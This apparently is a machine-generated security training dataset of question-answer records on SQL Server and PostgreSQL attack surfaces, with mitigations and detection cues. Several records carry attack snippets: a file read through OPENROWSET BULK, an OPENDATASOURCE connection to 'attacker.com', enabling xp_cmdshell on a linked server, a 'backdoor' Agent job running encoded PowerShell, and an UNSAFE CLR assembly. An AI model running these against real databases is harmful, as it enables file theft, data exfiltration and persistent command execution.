"human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132952Z", "updated_at": "2025-12-17T19:35:42.132952Z"} +{"id": "trtp-c802c510fe52", "instruction": "What are the main parts of SQL Server OPENROWSET and OPENDATASOURCE that security teams should understand?", "output": "SQL Server OPENROWSET and OPENDATASOURCE consists of the following key components:\n\n- OPENROWSET function\n- OPENDATASOURCE function\n- Ad Hoc Distributed Queries option\n- BULK option for file access\n- Remote server connections", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", 
"source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132971Z", "updated_at": "2025-12-17T19:35:42.132971Z"} +{"id": "trtp-2f4f3b266abc", "instruction": "Why is SQL Server OPENROWSET and OPENDATASOURCE important for database security?", "output": "These functions enable data exfiltration and file access without xp_cmdshell. OPENROWSET with BULK can read local files. Remote connections can be used to relay attacks or capture credentials.\n\nCommon attack vectors include:\n- File reading via BULK option\n- Credential capture through UNC paths\n- Data exfiltration to external servers\n- Lateral movement via linked servers", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132985Z", "updated_at": "2025-12-17T19:35:42.132985Z"} +{"id": "trtp-fa83e69ee135", "instruction": "How do attackers abuse SQL Server OPENROWSET and OPENDATASOURCE?", "output": "Attack techniques involving SQL Server OPENROWSET and OPENDATASOURCE:\n\n- File reading via BULK option\n- Credential capture through UNC paths\n- Data exfiltration to external servers\n- Lateral movement via linked servers\n\nDefenders can detect these attacks by:\n- OPENROWSET/OPENDATASOURCE usage\n- Ad Hoc Distributed Queries enablement\n- Connections to unexpected external sources", "category": 
"attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.132999Z", "updated_at": "2025-12-17T19:35:42.132999Z"} +{"id": "trtp-0a304203c9e6", "instruction": "How can security teams detect attacks related to SQL Server OPENROWSET and OPENDATASOURCE?", "output": "Methods for detecting SQL Server OPENROWSET and OPENDATASOURCE attacks or anomalies:\n\n- OPENROWSET/OPENDATASOURCE usage\n- Ad Hoc Distributed Queries enablement\n- Connections to unexpected external sources\n- BULK file access", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.133010Z", "updated_at": "2025-12-17T19:35:42.133010Z"} +{"id": "trtp-d93943bbb489", "instruction": "What security controls mitigate SQL Server OPENROWSET and OPENDATASOURCE risks?", "output": "Security controls and preventive measures for SQL Server OPENROWSET and OPENDATASOURCE:\n\n- Disable Ad Hoc Distributed Queries\n- Block outbound SQL Server connections\n- Monitor for these functions in queries\n- Restrict required permissions\n\nThese functions enable data exfiltration and file access without xp_cmdshell. OPENROWSET with BULK can read local files. 
Remote connections can be used to relay attacks or capture credentials.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.133022Z", "updated_at": "2025-12-17T19:35:42.133022Z"} +{"id": "trtp-d026152b1038", "instruction": "Provide a code example for SQL Server OPENROWSET and OPENDATASOURCE.", "output": "Example of SQL Server OPENROWSET and OPENDATASOURCE:\n\n```sql\n-- Read local file:\nSELECT * FROM OPENROWSET(BULK 'C:\\\\boot.ini', SINGLE_CLOB) AS x;\n\n-- Connect to external server:\nSELECT * FROM OPENDATASOURCE('SQLOLEDB','Data Source=attacker.com;User ID=sa;Password=pass').master.dbo.sysdatabases;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-openrowset-and-opendatasource", "license": "original", "retrieved_at": "2025-12-17T19:35:42.132922Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.133032Z", "updated_at": "2025-12-17T19:35:42.133032Z"} +{"id": "trtp-c6178d374661", "instruction": "Explain SQL Server Linked Servers from a security perspective.", "output": "Linked servers enable SQL Server to execute commands against remote data sources including other SQL Servers. Attackers abuse linked servers for lateral movement, privilege escalation, and data access across servers.\n\nSecurity Relevance: Linked servers extend attack surface across multiple databases. 
Compromising one server may provide access to all linked servers. Credential storage for linked servers is a high-value target.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134783Z", "updated_at": "2025-12-17T19:35:42.134783Z"} +{"id": "trtp-c68e34f959cc", "instruction": "Describe the technical aspects of SQL Server Linked Servers.", "output": "SQL Server Linked Servers consists of the following key components:\n\n- sp_addlinkedserver\n- EXECUTE AT linked server\n- Linked server credentials\n- RPC and RPC Out settings\n- Provider configurations", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134803Z", "updated_at": "2025-12-17T19:35:42.134803Z"} +{"id": "trtp-5e9db8c5f207", "instruction": "What security risks are associated with SQL Server Linked Servers?", "output": "Linked servers extend attack surface across multiple databases. Compromising one server may provide access to all linked servers. 
Credential storage for linked servers is a high-value target.\n\nCommon attack vectors include:\n- Enumerate linked servers\n- Execute commands across linked servers\n- Privilege escalation via trusted links\n- Credential harvesting from linked server config", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134818Z", "updated_at": "2025-12-17T19:35:42.134818Z"} +{"id": "trtp-1f9ee7f84830", "instruction": "What threats are associated with SQL Server Linked Servers?", "output": "Attack techniques involving SQL Server Linked Servers:\n\n- Enumerate linked servers\n- Execute commands across linked servers\n- Privilege escalation via trusted links\n- Credential harvesting from linked server config\n\nDefenders can detect these attacks by:\n- Linked server enumeration queries\n- Cross-server command execution\n- Linked server configuration changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134833Z", "updated_at": "2025-12-17T19:35:42.134833Z"} +{"id": "trtp-c0a2aa2e5a8b", "instruction": "How do you detect exploitation of SQL Server Linked Servers?", "output": "Methods for detecting SQL Server Linked Servers attacks or anomalies:\n\n- Linked server enumeration queries\n- 
Cross-server command execution\n- Linked server configuration changes\n- Unusual activity on linked servers", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134844Z", "updated_at": "2025-12-17T19:35:42.134844Z"} +{"id": "trtp-32a87b17c28b", "instruction": "What security controls mitigate SQL Server Linked Servers risks?", "output": "Security controls and preventive measures for SQL Server Linked Servers:\n\n- Minimize linked server usage\n- Use minimal privileges for linked connections\n- Audit linked server access\n- Disable RPC Out where not needed\n\nLinked servers extend attack surface across multiple databases. Compromising one server may provide access to all linked servers. 
Credential storage for linked servers is a high-value target.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134856Z", "updated_at": "2025-12-17T19:35:42.134856Z"} +{"id": "trtp-2ef09ebd2290", "instruction": "Provide a code example for SQL Server Linked Servers.", "output": "Example of SQL Server Linked Servers:\n\n```sql\n-- List linked servers:\nEXEC sp_linkedservers;\n\n-- Execute on linked server:\nEXEC ('SELECT * FROM master.sys.server_principals') AT [LinkedServerName];\n\n-- Enable xp_cmdshell on linked server:\nEXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LinkedServerName];\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-linked-servers", "license": "original", "retrieved_at": "2025-12-17T19:35:42.134754Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.134867Z", "updated_at": "2025-12-17T19:35:42.134867Z"} +{"id": "trtp-9e1ec31179ae", "instruction": "How does SQL Server Agent Jobs work and what are its security implications?", "output": "SQL Server Agent executes scheduled tasks and jobs. Attackers can create malicious jobs for persistence, lateral movement, or privilege escalation by exploiting Agent's ability to run commands under its service account.\n\nSecurity Relevance: Agent jobs run with elevated privileges by default. 
Malicious jobs provide persistence that survives database restarts. CmdExec and PowerShell steps enable arbitrary code execution.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136744Z", "updated_at": "2025-12-17T19:35:42.136744Z"} +{"id": "trtp-8cdc322219c2", "instruction": "What are the key components of SQL Server Agent Jobs?", "output": "SQL Server Agent Jobs consists of the following key components:\n\n- SQL Server Agent service\n- Job creation and scheduling\n- Job step types (T-SQL, CmdExec, PowerShell)\n- msdb database jobs tables\n- Proxy accounts", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136764Z", "updated_at": "2025-12-17T19:35:42.136764Z"} +{"id": "trtp-3781da937757", "instruction": "How can SQL Server Agent Jobs lead to database security incidents?", "output": "Agent jobs run with elevated privileges by default. Malicious jobs provide persistence that survives database restarts. 
CmdExec and PowerShell steps enable arbitrary code execution.\n\nCommon attack vectors include:\n- Create backdoor jobs for persistence\n- Execute arbitrary commands via CmdExec\n- PowerShell job steps for advanced attacks\n- Privilege escalation via Agent service account", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136779Z", "updated_at": "2025-12-17T19:35:42.136779Z"} +{"id": "trtp-b9c0f715bea0", "instruction": "How do attackers abuse SQL Server Agent Jobs?", "output": "Attack techniques involving SQL Server Agent Jobs:\n\n- Create backdoor jobs for persistence\n- Execute arbitrary commands via CmdExec\n- PowerShell job steps for advanced attacks\n- Privilege escalation via Agent service account\n\nDefenders can detect these attacks by:\n- New job creation in msdb\n- CmdExec or PowerShell job steps\n- Jobs created by non-DBA accounts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136793Z", "updated_at": "2025-12-17T19:35:42.136793Z"} +{"id": "trtp-d4a4497250ff", "instruction": "What indicators reveal malicious activity involving SQL Server Agent Jobs?", "output": "Methods for detecting SQL Server Agent Jobs attacks or anomalies:\n\n- New job creation in msdb\n- CmdExec 
or PowerShell job steps\n- Jobs created by non-DBA accounts\n- Suspicious job execution patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136804Z", "updated_at": "2025-12-17T19:35:42.136804Z"} +{"id": "trtp-b44ca38fc4ad", "instruction": "What are best practices for preventing SQL Server Agent Jobs?", "output": "Security controls and preventive measures for SQL Server Agent Jobs:\n\n- Restrict SQLAgentOperatorRole membership\n- Monitor msdb.dbo.sysjobs changes\n- Limit Agent service account privileges\n- Audit job creation and modification\n\nAgent jobs run with elevated privileges by default. Malicious jobs provide persistence that survives database restarts. 
CmdExec and PowerShell steps enable arbitrary code execution.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136816Z", "updated_at": "2025-12-17T19:35:42.136816Z"} +{"id": "trtp-d7b32cafb73e", "instruction": "Show an example of SQL Server Agent Jobs.", "output": "Example of SQL Server Agent Jobs:\n\n```sql\n-- Create malicious job:\nUSE msdb;\nEXEC sp_add_job @job_name = 'backdoor';\nEXEC sp_add_jobstep @job_name = 'backdoor', @step_name = 'exec', @subsystem = 'CmdExec', @command = 'powershell -e ';\nEXEC sp_add_jobserver @job_name = 'backdoor';\nEXEC sp_start_job @job_name = 'backdoor';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-agent-jobs", "license": "original", "retrieved_at": "2025-12-17T19:35:42.136714Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.136826Z", "updated_at": "2025-12-17T19:35:42.136826Z"} +{"id": "trtp-70ad1daa8be3", "instruction": "Describe SQL Server CLR Integration and its role in database security.", "output": "SQL Server CLR integration allows running .NET code within the database. Attackers can create malicious CLR assemblies for code execution, bypassing xp_cmdshell restrictions, or accessing protected resources.\n\nSecurity Relevance: CLR assemblies with UNSAFE permission can execute arbitrary code with SQL Server's privileges. 
Even EXTERNAL_ACCESS enables network and file operations. CLR provides powerful attack capabilities.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138595Z", "updated_at": "2025-12-17T19:35:42.138595Z"} +{"id": "trtp-94176f9e6cbc", "instruction": "What are the main parts of SQL Server CLR Integration that security teams should understand?", "output": "SQL Server CLR Integration consists of the following key components:\n\n- CLR enabled option\n- Assembly creation\n- SAFE/EXTERNAL_ACCESS/UNSAFE permission sets\n- Trustworthy database setting\n- CLR stored procedures", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138615Z", "updated_at": "2025-12-17T19:35:42.138615Z"} +{"id": "trtp-c08c6f6c6c8e", "instruction": "How can SQL Server CLR Integration lead to database security incidents?", "output": "CLR assemblies with UNSAFE permission can execute arbitrary code with SQL Server's privileges. Even EXTERNAL_ACCESS enables network and file operations. 
CLR provides powerful attack capabilities.\n\nCommon attack vectors include:\n- Create UNSAFE assembly for code execution\n- Bypass xp_cmdshell via CLR\n- File and network access through CLR\n- In-memory malware execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138630Z", "updated_at": "2025-12-17T19:35:42.138630Z"} +{"id": "trtp-bdf60434a79a", "instruction": "How can adversaries exploit SQL Server CLR Integration?", "output": "Attack techniques involving SQL Server CLR Integration:\n\n- Create UNSAFE assembly for code execution\n- Bypass xp_cmdshell via CLR\n- File and network access through CLR\n- In-memory malware execution\n\nDefenders can detect these attacks by:\n- CLR enabled configuration changes\n- Assembly creation events\n- UNSAFE or EXTERNAL_ACCESS permissions", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138644Z", "updated_at": "2025-12-17T19:35:42.138644Z"} +{"id": "trtp-71b69975a64b", "instruction": "What log entries indicate SQL Server CLR Integration attacks?", "output": "Methods for detecting SQL Server CLR Integration attacks or anomalies:\n\n- CLR enabled configuration changes\n- Assembly creation events\n- UNSAFE or EXTERNAL_ACCESS 
permissions\n- CLR procedure execution", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138656Z", "updated_at": "2025-12-17T19:35:42.138656Z"} +{"id": "trtp-2b986bb03c6f", "instruction": "What preventive measures address SQL Server CLR Integration vulnerabilities?", "output": "Security controls and preventive measures for SQL Server CLR Integration:\n\n- Disable CLR if not needed\n- Restrict assembly creation privileges\n- Monitor for UNSAFE assemblies\n- Avoid TRUSTWORTHY database setting\n\nCLR assemblies with UNSAFE permission can execute arbitrary code with SQL Server's privileges. Even EXTERNAL_ACCESS enables network and file operations. CLR provides powerful attack capabilities.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138668Z", "updated_at": "2025-12-17T19:35:42.138668Z"} +{"id": "trtp-9fe3f737f8a5", "instruction": "What is the syntax for SQL Server CLR Integration?", "output": "Example of SQL Server CLR Integration:\n\n```sql\n-- Enable CLR:\nEXEC sp_configure 'clr enabled', 1;\nRECONFIGURE;\n\n-- Create malicious assembly:\nCREATE ASSEMBLY EvilAssembly FROM 0x4D5A... 
WITH PERMISSION_SET = UNSAFE;\n\n-- Create procedure:\nCREATE PROCEDURE dbo.ExecCmd @cmd NVARCHAR(4000) AS EXTERNAL NAME EvilAssembly.StoredProcedures.ExecCmd;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-clr-integration", "license": "original", "retrieved_at": "2025-12-17T19:35:42.138565Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.138678Z", "updated_at": "2025-12-17T19:35:42.138678Z"} +{"id": "trtp-36aac0e8a4d1", "instruction": "What do security professionals need to know about SQL Server Service Accounts?", "output": "SQL Server services run under service accounts whose privileges determine the potential impact of compromise. Overprivileged service accounts enable lateral movement and domain escalation from SQL Server compromise.\n\nSecurity Relevance: SQL Server service accounts often have excessive privileges. Domain admin service accounts enable immediate domain compromise. 
Even regular domain accounts may enable Kerberos attacks and lateral movement.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140719Z", "updated_at": "2025-12-17T19:35:42.140719Z"} +{"id": "trtp-9622dfe414af", "instruction": "Describe the technical aspects of SQL Server Service Accounts.", "output": "SQL Server Service Accounts consists of the following key components:\n\n- SQL Server service account\n- SQL Agent service account\n- Domain vs local accounts\n- Managed Service Accounts (MSA)\n- Kerberos delegation", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140738Z", "updated_at": "2025-12-17T19:35:42.140738Z"} +{"id": "trtp-da9172bdb02e", "instruction": "Why is SQL Server Service Accounts important for database security?", "output": "SQL Server service accounts often have excessive privileges. Domain admin service accounts enable immediate domain compromise. 
Even regular domain accounts may enable Kerberos attacks and lateral movement.\n\nCommon attack vectors include:\n- Extract service account credentials\n- Kerberoasting service account SPNs\n- Lateral movement using service account\n- Domain escalation from DA service accounts", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140753Z", "updated_at": "2025-12-17T19:35:42.140753Z"} +{"id": "trtp-6dd63cefbfbb", "instruction": "How can adversaries exploit SQL Server Service Accounts?", "output": "Attack techniques involving SQL Server Service Accounts:\n\n- Extract service account credentials\n- Kerberoasting service account SPNs\n- Lateral movement using service account\n- Domain escalation from DA service accounts\n\nDefenders can detect these attacks by:\n- Unusual authentication by service account\n- Service account access to non-database resources\n- Credential material in memory dumps", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140767Z", "updated_at": "2025-12-17T19:35:42.140767Z"} +{"id": "trtp-d0633cee1633", "instruction": "What indicators reveal malicious activity involving SQL Server Service Accounts?", "output": "Methods for detecting SQL Server Service 
Accounts attacks or anomalies:\n\n- Unusual authentication by service account\n- Service account access to non-database resources\n- Credential material in memory dumps\n- Kerberos TGS requests for SQL SPNs", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140780Z", "updated_at": "2025-12-17T19:35:42.140780Z"} +{"id": "trtp-0a93ba3140d0", "instruction": "How do you defend against SQL Server Service Accounts attacks?", "output": "Security controls and preventive measures for SQL Server Service Accounts:\n\n- Use Managed Service Accounts\n- Apply least privilege to service accounts\n- Avoid domain admin service accounts\n- Constrain Kerberos delegation\n\nSQL Server service accounts often have excessive privileges. Domain admin service accounts enable immediate domain compromise. 
Even regular domain accounts may enable Kerberos attacks and lateral movement.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140791Z", "updated_at": "2025-12-17T19:35:42.140791Z"} +{"id": "trtp-4eb200d315cf", "instruction": "Provide a code example for SQL Server Service Accounts.", "output": "Example of SQL Server Service Accounts:\n\n```sql\n-- Check service account:\nSELECT servicename, service_account FROM sys.dm_server_services;\n\n-- Check impersonation capabilities:\nSELECT name FROM sys.server_principals WHERE is_disabled = 0;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mssql-sql-server-service-accounts", "license": "original", "retrieved_at": "2025-12-17T19:35:42.140689Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.140809Z", "updated_at": "2025-12-17T19:35:42.140809Z"} +{"id": "trtp-1a3933ee5d10", "instruction": "What do security professionals need to know about PostgreSQL COPY Command Exploitation?", "output": "PostgreSQL's COPY command transfers data between files and tables. With superuser privileges, COPY TO/FROM can read and write arbitrary files on the server, enabling data exfiltration and backdoor creation.\n\nSecurity Relevance: COPY TO PROGRAM provides direct command execution in PostgreSQL 9.3+. Even without PROGRAM, COPY enables file operations. 
Combined with SQL injection, this leads to server compromise.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142932Z", "updated_at": "2025-12-17T19:35:42.142932Z"} +{"id": "trtp-272386bc6ae0", "instruction": "Describe the technical aspects of PostgreSQL COPY Command Exploitation.", "output": "PostgreSQL COPY Command Exploitation consists of the following key components:\n\n- COPY TO for file writing\n- COPY FROM for file reading\n- COPY PROGRAM for command execution\n- pg_read_file alternative\n- File permission requirements", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-postgresql-postgresql-copy-command-exploitation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.142903Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.142953Z", "updated_at": "2025-12-17T19:35:42.142953Z"} +{"id": "trtp-e83e40697d61", "instruction": "From a security perspective, why should defenders understand PostgreSQL COPY Command Exploitation?", "output": "COPY TO PROGRAM provides direct command execution in PostgreSQL 9.3+. Even without PROGRAM, COPY enables file operations. 
